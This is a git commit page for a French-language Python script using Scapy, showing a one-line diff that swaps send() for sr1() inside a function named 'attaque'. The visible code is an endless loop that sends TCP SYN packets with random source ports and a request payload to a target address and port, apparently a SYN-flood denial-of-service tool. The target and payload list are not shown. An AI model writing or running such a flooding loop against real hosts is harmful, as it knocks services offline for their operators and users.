send -> sr
This commit is contained in:
parent
3d6630fdb4
commit
5b0309a4e8
1 changed files with 1 additions and 1 deletions
|
@ -20,7 +20,7 @@ def attaque():
|
||||||
while True:
|
while True:
|
||||||
requete = L[r.randint(0, 2)]
|
requete = L[r.randint(0, 2)]
|
||||||
paquet = IP(dst=adresse) / TCP(dport=port, sport=RandShort(), flags="S") / Raw(load=requete)
|
paquet = IP(dst=adresse) / TCP(dport=port, sport=RandShort(), flags="S") / Raw(load=requete)
|
||||||
send(paquet, verbose=True)
|
sr1(paquet, verbose=True)
|
||||||
|
|
||||||
if __name__ == "__main__":
|
if __name__ == "__main__":
|
||||||
attaque()
|
attaque()
|
||||||
|
|
Loading…
Add table
Add a link
Reference in a new issue